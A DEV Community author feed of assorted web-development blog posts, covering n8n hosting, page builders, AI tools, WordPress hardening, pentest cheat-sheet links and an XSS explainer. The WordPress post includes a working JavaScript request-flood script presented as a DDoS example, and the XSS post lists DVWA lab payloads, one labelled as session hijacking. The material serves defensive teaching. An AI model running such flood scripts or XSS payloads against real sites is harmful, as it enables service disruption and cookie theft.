DEV Community: And Go Web Solutions | AGWS

Setup N8N For Free with Supabase No Credit Card Verification Needed.

And Go Web Solutions | AGWS — Tue, 24 Mar 2026 19:10:09 +0000

🚀 Deploy n8n for FREE (No Credit Card Needed) – Full Tutorial

Tired of being asked for a credit card just to try cloud hosting? Want to run your own automation server without paying a dime? In this guide, I'll show you how to deploy n8n – a powerful open‑source workflow tool – on Hugging Face Spaces with a free Supabase database. No credit card required, and you get 16 GB of RAM, 2 vCPUs, and automatic HTTPS out of the box. Let’s dive in!

What You’ll Need

We’ll use three free services, all with email‑only signup:

Hugging Face Spaces – our hosting platform (gives us a free yourname.hf.space domain with SSL)
Supabase – our PostgreSQL database (free tier is plenty for n8n)
n8n template – a ready‑to‑run Space we’ll duplicate

No terminal, no Docker commands – just a few clicks and some environment variables.

Step 1: Duplicate the n8n Space

First, create a Hugging Face account – just your email. Then go to this link:

huggingface.co/spaces/tomowang/n8n

Click “Duplicate this Space”, give it a name (e.g., my-n8n-space), set visibility to Public, and hit duplicate. That’s it – your Space is created, but it’s not running yet because we need to connect a database.

Step 2: Set Up Supabase Database

Head to Supabase, sign up (again, just email), and create a new project.

Pick a name, set a strong database password – save it!
Choose a region close to you
Wait a minute for it to initialise

Once ready, go to Project Settings → Database. Scroll down to Connection string and find the Transaction pooler section. This is the secret sauce.

Click ‘Transaction pooler’ and copy the host, port, user, and database. Your host will look something like:

aws-1-eu-west-1.pooler.supabase.com or db.xxxxx.supabase.co
Port is 6543
User is postgres
Database is postgres

Keep these handy – we’ll use them in the next step.

Step 3: Environment Variables – The Heart of the Setup

Go back to your Hugging Face Space → Settings → Variables and secrets. This is where we tell n8n how to find the database and how to behave.

We’ll add two secrets (private) and several public variables.

Secrets (private)

N8N_ENCRYPTION_KEY – a random 32‑character string. Generate one in your terminal with

   openssl rand -base64 32

or use an online generator.

DB_POSTGRESDB_PASSWORD – the password you saved from Supabase.

Public variables

N8N_EDITOR_BASE_URL = https://YOUR-SPACE-NAME.hf.space/
WEBHOOK_URL = same as above
N8N_PROTOCOL = https
N8N_PORT = 7860 (this is critical – Hugging Face expects port 7860)
DB_POSTGRESDB_HOST = the host from Supabase (transaction pooler)
DB_POSTGRESDB_PORT = 6543
DB_POSTGRESDB_USER = postgres
DB_POSTGRESDB_DATABASE = postgres
DB_TYPE = postgresdb (optional but safe)
GENERIC_TIMEZONE = your local timezone (e.g., Europe/Berlin)
EXECUTIONS_DATA_PRUNE = true
EXECUTIONS_DATA_MAX_AGE = 72
EXECUTIONS_DATA_SAVE_ON_ERROR = all
EXECUTIONS_DATA_SAVE_ON_SUCCESS = none

Delete these if they exist: HTTP_PROXY, HTTPS_PROXY, NODE_TLS_REJECT_UNAUTHORIZED, N8N_HOST. They cause connection problems.

Alternative: Single DATABASE_URL

If you want to avoid managing all those DB_POSTGRESDB_* variables, you can replace them with a single secret called DATABASE_URL. Simply delete all the DB_POSTGRESDB_* variables, then add a secret with the full connection string from Supabase (transaction pooler). It looks like this:

postgresql://postgres:YOUR_PASSWORD@YOUR_HOST:6543/postgres

That’s it – much cleaner.

Step 4: Restart and Watch the Logs

Once all variables are set, go to the App tab, click the three dots, and select ‘Restart this Space’. Wait a moment, then open the Logs section.

You’re looking for a line that says:

n8n ready on ::, port 7860

If you see that, your Space is live!

Step 5: Access n8n and Create Admin Account

Now open your Space URL: https://YOUR-SPACE-NAME.hf.space. You’ll see the n8n login page. Click ‘Sign up’ and create your admin account. Congratulations – you’re now running n8n for free!

Troubleshooting Common Errors

If things go wrong, here’s how to fix them:

No encryption key found – make sure you added the N8N_ENCRYPTION_KEY secret. Re‑add it and restart.
connect ENETUNREACH … :5432 – you’re using the wrong port. Set DB_POSTGRESDB_PORT to 6543.
Tenant or user not found – your database host, user, or password is wrong. Double‑check the transaction pooler details in Supabase.
404 when visiting your Space – most likely n8n is listening on the wrong port. Make sure N8N_PORT=7860 and restart.

Why This Works & Bonus Tips

Hugging Face Spaces gives you a free domain, SSL, and more resources than most free cloud VMs. Supabase’s transaction pooler makes the connection stable even on the free tier. Your workflows are stored in Supabase, so they survive restarts.

If you ever want to upgrade n8n, simply edit the Dockerfile in your Space’s files and change the image tag, or re‑duplicate the latest template.

That’s It!

You now have a fully functional automation server at zero cost. If this helped you, feel free to share it or drop a comment if you have any questions. Happy automating!

Useful Links

n8n template (direct duplicate link): https://huggingface.co/spaces/baoyin2024/n8n-free?duplicate=true
Supabase: supabase.com
n8n documentation: docs.n8n.io

Page Builders You Wont Like as Developer

And Go Web Solutions | AGWS — Sat, 17 Jan 2026 05:24:17 +0000

Framer, Carrd, GHL: A Developer's Brutally Honest Take
Let's cut through the marketing. You're a developer being asked to build or maintain a site on one of these platforms. Here's what you're actually signing up for, where each one will make you want to pull your hair out, and what you should use instead.

Framer: The Designer's Toy Framer markets itself as the revolutionary web tool for designers. And it is—for designers. For anyone trying to build a real, content-managed website, it's a pain.

The "Simple" Illusion: Yes, the visual editor is slick. Dragging components feels great... until you need to connect it to real data.

Dynamic CMS is an Afterthought: This is the deal-breaker. Framer's CMS feels bolted on as an aftermarket part. Managing collections, references, and rich text is clunky and unintuitive compared to any dedicated CMS. It's a constant context switch between design mode and a cramped data panel.

Hostage Pricing Model: Need more than one CMS collection type on the starter plan? Tough. Want to add a client or a content editor as a contributor? That's an extra $20/month per person. This makes it financially insane for any project with a team.

The "Advantage": The ready-made components are nice, but that's table stakes. Every other tool has these now.

💀 The Verdict: Use Framer for prototyping or ultra-simple brochure sites where you hand off a static design. For anything content-driven or collaborative, you're in for a world of friction.

🚀 Developer Alternatives:

Webflow: If you need no-code design freedom with a powerful, native CMS. It has a steeper learning curve but outputs clean, production-ready code.

WordPress (Headless): For ultimate control. Pair a modern frontend (Next.js, Nuxt) with WordPress as a headless CMS via its API. You get Framer-like flexibility in your stack with WP's unbeatable content management. It's often cheaper and has zero limits on users or content types.

Carrd.co: It Does One Thing. That's It. Carrd is brilliant at its singular purpose: making a good-looking, single-page site in 5 minutes. No more, no less.

The 1-Page Wall: This is its core feature and its fatal flaw. The moment you need an "About" page and a "Blog" page, you've outgrown Carrd.

SEO is a Non-Starter: A single-page site is terrible for building topical authority. Your ability to optimize is severely limited.

The $19/Year Trap: The price is compelling. But if you know HTML/CSS/JS, you're paying for convenience you don't need. You can build something better yourself.

💀 The Verdict: Perfect for a quick, disposable landing page or a personal link-in-bio. A terrible choice for any business, portfolio, or project meant to grow.

🚀 Developer Alternative: Go Static.
This is the key point. You are the target market for the alternative.

Build it yourself: Write the HTML/CSS. Use a static site generator like 11ty, Hugo, or Astro for more power.

Host it for free (or pennies): Deploy it to Cloudflare Pages, Netlify, or Vercel. Connect your custom domain. You get:

Better performance (global CDN).

Perfect SEO control (clean URLs, meta tags, sitemaps).

Zero lock-in. Your site is just files.

A similar or lower cost than Carrd's $19/year (often free for basic sites).

GoHighLevel (GHL): The Marketing Beast GHL is not a website builder; it's an all-in-one marketing and CRM platform. Judging it as a website tool is missing the point, but its builder is where developers get brought in.

It Shines for Sales Funnels: The booking system, SMS/email automation, and pipeline management are its raison d'être. For a service business, it's powerful.

The Developer Experience Sucks: The website/funnel builder is utilitarian. It's built for speed and conversion, not clean code or elegant design. Implementing custom visuals or complex interactions is a fight against the platform. It feels outdated and restrictive.

💀 The Verdict: Use GHL for what it's best at: marketing automation, CRM, and booking. Do not use it as your primary website if design or custom functionality matters.

🚀 Developer Strategy: Decouple.
Build your main, public-facing website on WordPress or Webflow for design control and SEO. Use GHL purely for its marketing superpowers—embed its booking widget or tracking code on your site. This gives you the best of both worlds.

The Takeaway: Use the Right Tool for the Job
Platform Real Developer Pain Points What to Use Instead
Framer Cumbersome CMS, outrageous contributor fees. Webflow (for design+CMS) or Headless WordPress (for control).
Carrd One-page limit, zero scalability. A static site you build & host on Cloudflare/Netlify.
GoHighLevel Clunky, restrictive builder for custom work. WordPress/Webflow for main site, GHL only for funnels/CRM.
Stop trying to make platforms do things they hate. For developers, the "better alternative" is often to bypass the proprietary tool entirely and own your stack.

Top AI Tools for Developers & Designers

And Go Web Solutions | AGWS — Fri, 14 Mar 2025 12:43:46 +0000

In today’s fast-paced digital world, AI-powered tools are revolutionizing the way developers and designers work. Whether you're looking to convert screenshots into code, generate stunning color palettes, or create professional logos in seconds, AI is making it easier than ever.

In this article, we’ll explore the best AI tools that can enhance your workflow and boost productivity in UI/UX design, front-end development, and branding. Let’s dive in! 🌊

🎯 Top AI Tools for Developers & Designers

🔥 1. V0 by Vercel - AI-Powered UI Component Builder
📌 Website: V0 by Vercel

🔹 What It Does: V0 uses AI to generate React components in seconds, saving front-end developers hours of work. Instead of manually writing UI components, just describe what you need in plain English—and V0 will generate high-quality, production-ready code.

🔹 Best Use Cases:
✅ Quickly generate UI components for Next.js and React apps
✅ Speed up development with pre-built, AI-generated designs
✅ Easily customize and export directly into your codebase

💡 Pro Tip: Combine V0 with Tailwind CSS for a sleek and responsive design system! 🚀

🖌 2. Visily.ai - Convert Screenshots to Figma Instantly
📌 Website: Visily.ai

🔹 What It Does: If you’ve ever had a great idea sketched on paper or a screenshot of a UI you love, Visily converts it into editable Figma designs with AI-powered wireframing.

🔹 Best Use Cases:
✅ Convert low-fidelity sketches into high-fidelity UI mockups
✅ Transform screenshots into editable Figma layers
✅ Collaborate in real time with your team on design ideas

🎯 Who Should Use It?
✅ UI/UX Designers
✅ Product Managers
✅ Front-End Developers looking for faster prototyping

💡 Pro Tip: Use Visily to turn hand-drawn wireframes into digital designs in seconds! 🖍✨

💻 3. BlackBox.ai - Screenshot to Code in One Click!
📌 Website: BlackBox.ai

🔹 What It Does: This AI tool takes a screenshot of a website or UI and converts it into functional code. No more manually inspecting elements!

🔹 Best Use Cases:
✅ Convert screenshots of websites into actual HTML/CSS/JS code
✅ Extract code snippets from images and PDFs
✅ Generate SQL queries from natural language prompts

🎯 Who Should Use It?
✅ Front-End Developers
✅ Web Scrapers & Data Engineers
✅ AI Enthusiasts Automating Tasks

💡 Pro Tip: Use BlackBox alongside ChatGPT for even better code refinement! 🔥

🎨 4. Color Magic - AI-Powered Color Palette Generator
📌 Website: Color Magic

🔹 What It Does: Need the perfect color palette for your website, app, or branding? Color Magic generates AI-driven color schemes based on mood, theme, and industry trends.

🔹 Best Use Cases:
✅ Generate custom color palettes for web & mobile apps
✅ Get harmonious color combinations for branding
✅ Create beautiful gradient backgrounds

🎯 Who Should Use It?
✅ Graphic Designers
✅ UI/UX Designers
✅ Web Developers

💡 Pro Tip: Try "Dark Mode" themes for modern UI designs! 🌑🔥

🏆 5. Adobe Free Logo Generator - Instant AI Branding
📌 Website: Adobe Logo Generator

🔹 What It Does: No design experience? No problem! Adobe’s AI-powered logo generator lets you create stunning logos in minutes.

🔹 Best Use Cases:
✅ Startups & Small Businesses needing professional logos
✅ Developers launching new side projects
✅ Freelancers & Creators looking for quick branding

🎯 Who Should Use It?
✅ Business Owners
✅ Content Creators
✅ Designers & Freelancers

💡 Pro Tip: Customize fonts, colors, and icons for a unique touch! 🔥

📢 Bonus: Discover What Websites Are Built With! 🔍
Want to analyze a website's tech stack? Use Wappalyzer to discover:
✅ What framework (React, Vue, Angular) a website is using
✅ What CMS (WordPress, Shopify, Webflow) is behind the scenes
✅ What analytics, marketing, and security tools are running

💡 Pro Tip: Use Wappalyzer to reverse-engineer successful websites and learn best practices! 🔥

⚠️ Important Notice on AI Tools & Ethics
While AI-powered tools are powerful, it’s essential to use them responsibly:
✔ Always double-check AI-generated code for security vulnerabilities
✔ Customize AI designs to maintain originality
✔ Respect copyright & licensing when using AI-generated content

🔹 AI should enhance human creativity, not replace it. 🚀

🎬 Final Thoughts: Level Up Your Workflow!
These AI tools are game-changers for developers, designers, and creators! Whether you're building UI components, generating code, designing logos, or picking colors, AI can save you hours of work and help you focus on what truly matters.

🚀 Which AI tool is your favorite? Drop a comment below! 💬👇

🔔 Don’t forget to bookmark this article & share it with fellow developers & designers! 📢🔥

After More than 5 Years of Maintaining WordPress Websites, Here’s What I’ve Learned

And Go Web Solutions | AGWS — Thu, 23 Jan 2025 18:05:38 +0000

Introduction

If someone tells you, "Don’t worry, my website is secure," then you’re not paranoid enough—this guide is for you. As scammers and hackers become increasingly sophisticated, securing your WordPress website is more critical than ever. Below, I’ve compiled a practical guide to help you mitigate common WordPress vulnerabilities and exploits.

1. Use Secure and Maintained WordPress Themes

Avoid Stolen Plugins or Themes

Never use pirated or unsupported themes or plugins—they’re often compromised. Avoid one-off sales for plugins if they don’t offer ongoing support.

Choose Well-Maintained Themes

Opt for themes that are regularly updated and supported. For corporate projects, consider using themes provided or adapted through WPVIP for enhanced security and support.

Use WordPress as a Headless CMS

Modern tools like NextJS and the WP Rest API allow you to use WordPress as a backend while leveraging the power of front-end frameworks like React or Angular. This approach can improve performance and security.

2. Implement Robust Security Measures

Regular Maintenance

Always keep WordPress core, themes, and plugins up to date. Security patches and updates are essential to protect against known vulnerabilities.

Web Penetration Testing

WPScan: Use this tool to scan for WordPress-specific vulnerabilities.
BurpSuite: Perform security inspections on headers and cookies.
Nmap: Run Nmap on your server’s IP to check for unnecessary open ports (e.g., SSH or WP-CLI). Restrict or disable these ports if not needed.

SSH & WP-CLI Hardening

Lock down SSH access and handle WP-CLI carefully to prevent potential exploits.

Disable Unused API Routes

Turn off any API endpoints you aren’t using to limit exposure. For example, disable rest_route=/wp/v2/users to prevent username leaks.

Scan for Leaked Information

Regularly check posts, comments, and other content for accidentally exposed usernames or sensitive data.

3. Rate Limit Users

Your users don’t need unlimited requests. Implement rate limiting to prevent abuse. For example, limit requests to 500 per minute and block excessive traffic. This can help mitigate DDoS attacks.

Example of a DDoS Attack Script

function floodImagesXYZ() {
  var TARGET = ""; // ADD TARGET URI
  var URI = "/index.php?";
  var pic = new Image();
  var rand = Math.floor(Math.random() * 10000000000000000000000);
  try {
    pic.src = "http://" + TARGET + URI + rand + "=val";
  } catch {
    (error) => {
      console.log(error);
      console.log("Error in:", URI);
    };
  }
}
setInterval(floodImagesXYZ, 10);

This script demonstrates how easily a server can be overwhelmed by repeated requests. Implementing rate limiting and using tools like Cloudflare can help absorb such attacks.

4. Use Hardening Tools

Block Unnecessary File Uploads

If you don’t need to upload files via PHP, block that functionality to reduce vulnerabilities.

Additional Hardening

Implement server configurations and tools to mitigate common threats, such as file permission issues or vulnerable script executions.

5. Manage Builder Editors Carefully

If you’re using page builders like Divi, Elementor, or WPBakery, disable hardening tools that block PHP uploads while making changes. For example, Elementor might throw errors like the_content() not being present if the firewall blocks legitimate requests.

6. Custom Code Best Practices

Review Custom Code

Always review custom scripts, widgets, and third-party integrations to ensure they’re secure.

Use Development Tools

Plugin Check Plugin: For reviewing plugins before submission to the WordPress directory.
Envato Theme Checker: For ensuring theme security and compliance.
PHPUnit: For unit testing custom code.
PHP Code Beautifier: For adhering to PHP coding standards.

Escape Data and Validate Nonces

Always escape output and validate nonces when sending information to prevent security breaches.

7. Install a Web Application Firewall (WAF)

Use a WAF like Wordfence

A good WAF filters out malicious traffic, prevents brute-force attacks, and safeguards against common web application vulnerabilities.

Proactive Defense

Enable active monitoring on your WAF to log and block suspicious activity.

8. Leverage Cloudflare for Extra Protection

Connect Your Site Through Cloudflare

Cloudflare adds a layer of protection by filtering out malicious traffic before it reaches your server.

DDoS Mitigation

Cloudflare is especially useful for blocking DDoS attacks and protecting your site from traffic surges.

9. Backup Regularly

Keep Up-to-Date Backups

Ensure you always have current backups of your files and database.

Know Your Restoration Process

Familiarize yourself with the restoration process to quickly recover your site if needed.

10. Enable Two-Factor Authentication (2FA)

Use 2FA for Admin Access

Add an extra layer of protection by enabling Two-Factor Authentication (2FA) for all admin accounts. This prevents unauthorized access even if login credentials are compromised.

11. Implement reCAPTCHA for Forms and Login

reCAPTCHA v3 for Login

Protect your login page against bot logins and brute-force attacks without disrupting the user experience.

reCAPTCHA v2 for Forms

Use reCAPTCHA v2 for contact forms, registration forms, and other user inputs to prevent spam submissions.

Conclusion

Even with all these security measures in place, no system is 100% secure. The key is to make your website as secure as possible and remain vigilant. Regularly back up your site, monitor for vulnerabilities, and stay informed about emerging threats.

Remember, hackers don’t target businesses personally—it’s purely about money. Large businesses are often attacked the most due to their visibility and potential financial rewards. That’s why many companies offer bug bounty programs to mitigate risks further.

Stay proactive, and don’t underestimate the importance of ongoing maintenance and security.

References and Further Reading

Compilation of Essential Web Pentesting Cheat Sheets

And Go Web Solutions | AGWS — Mon, 02 Sep 2024 12:20:37 +0000

This article is a curated compilation of various web penetration testing cheat sheets. The purpose is to bring together valuable resources and tools in one place, enabling efficient access to real-world examples of XSS, SQL Injection, protocol analysis, cURL commands, and more. By using this guide, you can avoid having countless tabs open and instead focus on the most relevant and useful references for web security testing.

1. XSS (Cross-Site Scripting) Cheat Sheet

Port Swigger provides a detailed XSS cheat sheet that covers various injection techniques and bypass methods: XSS Cheat Sheet by Port Swigger
GBHackers offers a comprehensive list of 500 XSS payloads: Top 500 Important XSS Cheat Sheet

2. SQL Injection Cheat Sheet

Port Swigger offers an extensive guide on SQL Injection techniques: SQL Injection Cheat Sheet by Port Swigger
Invicti provides another excellent resource for SQL Injection testing: SQL Injection Cheat Sheet by Invicti
Additional resources include:
- OWASP XSS Filter Evasion Cheat Sheet
- Bypass WAF with SQLMAP

3. cURL Cheat Sheet

Devhints and QuickRef.me provide concise guides for using cURL, covering the most important commands and options:
- cURL Cheat Sheet by Devhints
- cURL Quick Reference

4. OWASP Cheat Sheet Series

OWASP's comprehensive cheat sheet series covers various aspects of web security, from secure coding practices to testing methodologies: OWASP Cheat Sheet Series

5. SSH Cheat Sheet

QuickRef.me provides a helpful cheat sheet for SSH commands and usage tips: SSH Cheat Sheet

Additional Resources

General Web Security Protocols by Mozilla: Mozilla's Web Security Guidelines
Deobfuscation Tool for JavaScript: De4js Deobfuscator
Nmap Cheat Sheet for network scanning and security auditing:
- Nmap Cheat Sheet by GeeksForGeeks
- Nmap Cheat Sheet by Jasonniebauer

Operating System-Specific Cheat Sheets

Linux Commands Cheat Sheet: Linux Commands by GeeksForGeeks
- Debian Distributions: Debian Command Reference
- Arch Linux: Arch Linux Command Guide | Cheatography's Linux and Arch Commands
- Slackware: Slackware Book
- RedHat: RedHat Cheat Sheets | RHEL Cheat Sheets
Windows Cheat Sheets:
- CMD Commands: Windows CMD Commands Cheat Sheet
- PowerShell: PowerShell Quick Reference | PowerShell GitHub Repository
MacOS Terminal Commands: Mac Terminal Commands Cheat Sheet

Conclusion

These cheat sheets are not just lists of commands you could obtain by using --help or -h. Instead, they provide practical, real-life examples and techniques that are essential for web penetration testing. This compilation aims to be a one-stop source, bringing together the most relevant information to streamline your workflow and enhance your testing efficiency.

Classic Front end Libraries for React

And Go Web Solutions | AGWS — Wed, 14 Aug 2024 15:13:57 +0000

Although new frontend technologies emerge daily, it's essential to revisit some classic frontend libraries, understanding their benefits and disadvantages. These libraries have set standards in the web industry and continue to be widely used today. The order below doesn't indicate superiority but is simply random.

1. Bootstrap 5

Bootstrap is a comprehensive frontend toolkit offering customizable SASS and prebuilt components.

Advantages

Ease of Use: Simple to integrate and maintain. ✅
Dark/Light Modes: Built-in support. ✅
Custom Coloring: Utilizes SCSS or custom CSS class names. ✅
Large Component Library: A wide range of components available. ✅
Predefined Colors: Includes warning, info, and success classes. ✅
Low Learning Curve: Easy to pick up. ✅
Small Size: Version 5.3.3 is 59.1 kB (minified) and 16.0 kB (GZIP). ✅
Design Tool Integration: Compatible with Figma and Adobe XD using public libraries. ✅

Disadvantages

Overuse: Commonly used, leading to similar-looking websites. ❌
Bloated Designs: Potential for heavy, non-optimized design. ❌
Limited Customizations: Flexibility is somewhat restricted. ❌
JavaScript Dependency: Includes JavaScript components (e.g., bootstrap.bundle.js) but lacks jQuery by default, though it can be added. ❌

2. TailwindCSS

TailwindCSS is known for its utility-first approach, offering extensive customization.

Advantages

Dark/Light Modes: Supported. ✅
Ease of Use: Simple to maintain. ✅
Customizable: Using CSS or SCSS. ✅
Team-Friendly: Suitable for both large and small projects. ✅
Easy Updates: Regularly updated with easy integration. ✅
Responsive Customizations: Uses classes like sm, md, and lg. ✅
Unique Designs: Allows for creative, custom designs. ✅

Disadvantages

Bloated Code: Can result in larger file sizes. ❌
Complexity: Harder to use for intricate designs. ❌
Limited Customizations: Requires custom JS/CSS for interactive elements. ❌

3. Bulma

Bulma differs from Bootstrap and Tailwind in that it requires no CSS knowledge, yet offers similar utility.

Advantages

Beginner-Friendly: Easy to start with. ✅
Predefined Colors: Similar to Bootstrap but uses syntax like is-primary, is-link, etc. ✅
Unique Appearance: Stands out compared to Bootstrap. ✅

Disadvantages

Larger Size: Minified version is 180 KB; GZIP is 24 KB. ❌
No Built-in JavaScript: Lacks JavaScript or jQuery for components. ❌

4. Ant Design

Ant Design is highly popular, especially in React projects, and is used by companies like Tailwind.

Advantages

Flexibility: Highly adaptable. ✅
Modern & Elegant: Offers a look similar to Material Design. ✅
Minimalistic Style: Utilizes CSS-in-JS for dynamic theming and better performance. ✅
Mobile Friendly: Includes mobile-specific components. ✅
Design Tool: Comes with its own design tool called "Kitchen." ✅

Disadvantages

Framework-Specific: Officially supports only React, Vue, and Angular. ❌
Creativity Limitation: Prioritizes enterprise-level projects over creative freedom. ❌

5. Material UI

Material UI is known for its aesthetically pleasing design, ideal for enterprise applications.

Advantages

Visually Appealing: Offers a clean, modern design. ✅
Premade Templates: Comes with ready-to-use templates. ✅
Design Tool Integration: Compatible with Figma and Adobe XD. ✅

Disadvantages

Code Bloat: Customizations often lead to bloated code. ❌

Conclusion

All these libraries are visually appealing and robust, each with its own use cases. For large projects requiring frequent updates, Bootstrap and TailwindCSS are excellent choices. Ant Design and Material UI are more suited for enterprise applications, while Bulma offers a unique, aesthetic alternative. Ultimately, the best library depends on your specific needs. Personally, I've used all the libraries mentioned for various production websites, and each has its strengths.

References

How to Compress .glb File to Draco Compressed Format

And Go Web Solutions | AGWS — Mon, 20 May 2024 06:28:04 +0000

Steps

Compress GLB File to Draco Compressed Format Using optimizeglb.com
View Compressed Draco Files at 3dpea.com
Add Relevant Code to ThreeJS

import { GLTFLoader } from 'https://cdn.skypack.dev/three@0.136.0/examples/jsm/loaders/GLTFLoader.js';
import { DRACOLoader } from 'https://cdn.skypack.dev/three@0.136.0/examples/jsm/loaders/DRACOLoader.js';

const draco = new DRACOLoader();
draco.setDecoderPath('https://www.gstatic.com/draco/v1/decoders/');

const loader = new GLTFLoader(); // ADD DracoLoader to your Existing Loader 
loader.setDRACOLoader(draco);

Replace Your Current 3D GLB File with Compressed Draco Format
Enjoy 90% Less in terms of The 3D File Size.

References

The Reality of Using WebGL & Frameworks Like Three.js and Babylon.js

And Go Web Solutions | AGWS — Sun, 12 May 2024 05:11:18 +0000

3D Websites Require a Higher Learning Curve

• Learning WebGL, Three.js, or Babylon.js involves understanding the canvas, coordinate systems, and other fundamentals.
• Optimizing textures and 3D files (e.g., .stl, .fbx, .gltf, .glb) is necessary for performance11,21,23,25.
• Developers need to optimize textures, poly counts, and simplify geometry.
• Web developers may lack 3D skills initially, making optimization challenging.
3D Websites Require a Lot of Computer Resources & Are Harder to Optimize

• 3D websites focus on RAM usage, requiring substantial resources.20,21
• High-end hardware is needed for optimal performance, which may not be accessible to average users,Check Blender Best Computer Specifications for Example at 15.
• High memory usage can lead to slow loading times and poor user experiences.19,20
Justifying Development Costs Using 3D in Websites is Used in Niche Use Cases

• Examples like Ikea demonstrate effective use of 3D for product visualization.
• Personal portfolios can also benefit from 3D elements but are niche use cases.
Comparsion Between ThreeJS and BablyonJS WebGL FrameWorks

• Three.js and Babylon.js are popular WebGL frameworks, each with its advantages and disadvantages.
• Babylon.js offers Native TypeScript support, while Three.js has a larger community and a community package for typescript support.
• Babylon.js provides better debugging tools.
Check 26
Conclusion & Best Use Case Examples for 3D Modeling

• 3D modelling is suitable for interior design, museums, personal, and company portfolios.
• Optimizing assets and utilizing loading options can improve performance.
• Examples like Ikea's room builder showcase effective 3D implementation.
Conclusion
• 3D websites have potential but require significant development effort and resources.
• High hardware requirements and optimization challenges limit widespread adoption.
• Advances in hardware, like ARM processors, may improve 3D web experiences in the future.

References

Understood! Here are all your references organized with link names:

Web Graphics and Performance

WebGL Memory Consumption:
- WebGL Excessive Memory Consumption
Slow Loading 3D Models:
- Models Load Slow on Netlify
Slow 3D Websites:
- Why Do We Not See More 3D Websites
Three.js Performance Optimization:
- Load Time:
  - How to Improve the Load Time of My App
- Memory Usage:
Babylon.js vs Three.js Performance:
- BabylonJS vs ThreeJS performance comparison
WebGL Frameworks Performance:
- Main Reasons for Performance Differences Between WebGL Frameworks

3D Resources

Blender for Dummies: [12]
Steam Hardware Survey: Steam Hardware & Software Survey
Open Data Blender: [15]

Browser Compatibility

WebGL Memory Issues in Brave Browser: Brave Browser WebGL Memory Issue

WebGL Memory Tracking and Optimization

WebGL Memory Tracker Library: Library to Track WebGL Memory
Unity WebGL Memory Management: Memory in Unity WebGL

Other (Potentially Relevant)

Smartphone RAM: How Much RAM is in Smartphones

Other (Not Relevant)

AMD EPYC Processor: [16]
Ikea Bestå Shelf Unit: [17]
DRAM Revenue Statistics: Global DRAM Revenues of Semiconductor Companies Since 2010
Three.js vs Babylon.js: Difference Between Three.js and Babylon.js
Why Use Babylon.js: Why We Use BabylonJS Instead of ThreeJS in 2022
Three.js and TypeScript: Is Three.js Completely Compatible with Typescript at This Stage

Best FrontEnd & New ReUsable Component Libraries For React JS 2024.

And Go Web Solutions | AGWS — Tue, 07 May 2024 23:30:00 +0000

# Best FrontEnd & New ReUsable Component Libraries For React JS 2024
Youtube Video

1. ShadCN

ShadCN
- Description: This is not a library of components. You can copy and paste this collection of reusable components into your apps.
Advantages:
1. Ownership and Control over Components✔️
2. Style is not coupled with the implementation✔️
3. Works on Any Framework That Supports React Like Next.js, Astro, Remix, Gatsby etc.✔️
Improvements:
1. Harder to Setup for beginners ❌

2. Plate.js

Plate.js
plate - github
- Description: Plugin system & primitive component library. CLI for styled components. Customizable. Open Source
Advantages:
1. Easier to Setup ✔️
2. Code and Custom Plugins Can be Set.✔️
3. Based On RadixUI, and ShadCN/UI.✔️
Improvements:
1. Newer Library With a unique way to setup that can be simplified.❌

3. Radix UI

Radix UI
- Description: A pre-styled component library called Radix Themes is intended to function right out of the box with little setup required. Visit Radix Primitives if you're seeking for the unstyled components.
Advantages:
1. Works on Any Framework That Supports React Like Next.js, Astro, Remix, Gatsby etc.✔️
2. Can Install an icon package as well npm i @radix-ui/react-icons✔️
3. Can have a custom Color Palette like TailwindCSS Custom Colors.✔️
4. Can Install individual Components using Primitives.✔️
Improvements:
1. Harder to Setup ❌
2. No Ownership and Full Control over Components❌

4. Acternity UI

Acternity UI
- Description: A UI library with visually appealing components built on Next.js, React, TailwindCSS, and Framer Motion.
Advantages:
1. Works on Any Framework That Supports React Like Next.js, Astro, Remix, Gatsby etc.✔️
2. Best UI Looking Components✔️
3. Can Install Multiple Free Reusable Components.✔️ Components
4. Ownership and Full Control over Components
Improvements:
1. Needs some dependencies to work properly (framer-motion clsx tailwind-merge @tabler/icons-react), however, these packages are what makes it simple to use something like Acternity UI.❌

5. NextUI

NextUI
- Description: With the aid of the React UI library NextUI, you can create stunning and easily navigable user interfaces. Built around React Aria and Tailwind CSS.
Advantages:
1. Independent community project From Vercel. ✔️
2. Built on React TailwindCSS ✔️
3. Can Install individual Components✔️
4. Provides a set of accessible and customizable components, hooks, and utilities.✔️

Understanding Cross-Site Scripting (XSS) Vulnerabilities

And Go Web Solutions | AGWS — Thu, 15 Feb 2024 07:41:10 +0000

Understanding Cross-Site Scripting (XSS) Vulnerabilities

🔍 Introduction to Cross-Site Scripting (XSS) Vulnerabilities

Cross-site Scripting (XSS) is a persistent security threat on the web, recognized by the Open Web Application Security Project (OWASP) as one of the top-10 risks. Despite being an old technique, XSS vulnerabilities continue to plague websites, posing serious risks to user data and system integrity.

🔍 Instances of XSS Attacks on Companies

🔍 Real-Life Cases of Cross-Site Scripting Incidents

British Airways Incident: In 2018, British Airways fell victim to an XSS attack orchestrated by Magecart, leading to the compromise of 380,000 transactions. The attackers exploited an XSS vulnerability in the Feedify JavaScript library, redirecting customer data to a fraudulent server and executing credit card skimming. Reference

Fortnite Vulnerability: In 2019, the popular game Fortnite encountered an XSS vulnerability affecting millions of users. Attackers could potentially access user data and redirect them to counterfeit login pages, facilitating theft of virtual currency and unauthorized access to conversations.

eBay's XSS Challenge: During late 2015 and early 2016, eBay faced a severe XSS vulnerability, allowing attackers to inject malicious code into pages. This enabled unauthorized access to seller accounts, manipulation of high-value listings, and exploitation of payment details.

🔍 Varieties of XSS Attacks

Reflected XSS
- Definition: Originates from the current HTTP request.
- Impact: Enables attackers to compromise user accounts and perform malicious actions.
- Detection: Can be detected through careful analysis of input and output data.
- Example: Injecting a script through a search function's URL parameter.
- Mitigation: Implement input validation and output encoding to prevent script execution. Reference

Example in DVWA:
localhost/dvwa/vulnerabilities/xss_r/?name=<script>alert('XSS: Attack test')</script>

Stored XSS
- Definition: Malicious script is sourced from the website's database.
- Impact: Allows attackers to persistently infect users accessing the compromised data.
- Detection: Requires scanning database entries for suspicious script content.
- Example: Injecting code into user-generated content like comments or profiles.
- Mitigation: Implement strict input validation, output encoding, and content filtering. Reference

Example from Pentest-Tools:

Hijacking User Session:
localhost/dvwa/vulnerabilities/xss_r/?name=<script>alert(document.cookie)</script>

DOM-based XSS
- Definition: Vulnerability lies within client-side code rather than server-side code.
- Impact: Facilitates script execution directly in the user's browser, often evading server-side detection.
- Detection: Challenging to detect server-side; requires client-side analysis or specialized tools.
- Example: Exploiting client-side JavaScript functions to execute malicious scripts.
- Mitigation: Implement client-side validation, avoid using unsafe DOM manipulation methods, and sanitize all user input. Reference

